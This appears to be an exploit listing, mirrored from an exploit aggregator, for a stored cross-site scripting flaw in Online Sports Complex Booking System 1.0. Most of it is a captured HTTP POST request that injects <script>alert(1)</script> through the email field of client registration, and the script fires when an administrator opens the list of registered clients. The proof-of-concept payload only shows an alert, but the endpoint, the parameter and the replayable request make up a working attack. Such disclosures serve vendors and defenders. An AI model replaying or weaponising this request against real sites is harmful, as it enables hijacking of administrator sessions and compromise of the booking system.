Exploit for Online Sports Complex Booking System 1.0 Cross Site Scripting

Name: Exploit for Online Sports Complex Booking System 1.0 Cross Site Scripting
Rating: 5 (313 reviews)
2022-04-08 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:166641
Title: Online Sports Complex Booking System 1.0 XSS  
Author: Zllggggg  
Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html  
Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip  
Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.md  
Tested on: Windows, MySQL, Apache  
  
Description:  
  
When registering users at the front desk, when we fill in the information,  
we use burpsuite to catch the data packet,After obtaining the data packet,  
modify the email parameter to <script>alert(1)</script> then send the  
packet,Then log in to the background with the administrator account ,Click  
registered clients to trigger the pop-up window  
  
Data packet  
POST /scbs/classes/Users.php?f=save_client HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)  
Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------289647566033806702832762971625  
Content-Length: 1284  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/scbs/register.php  
Cookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="id"  
  
1  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="firstname"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="middlename"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="lastname"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="gender"  
  
Male  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="contact"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="address"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="email"  
  
<script>alert(1)</script>  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="password"  
  
123  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------289647566033806702832762971625--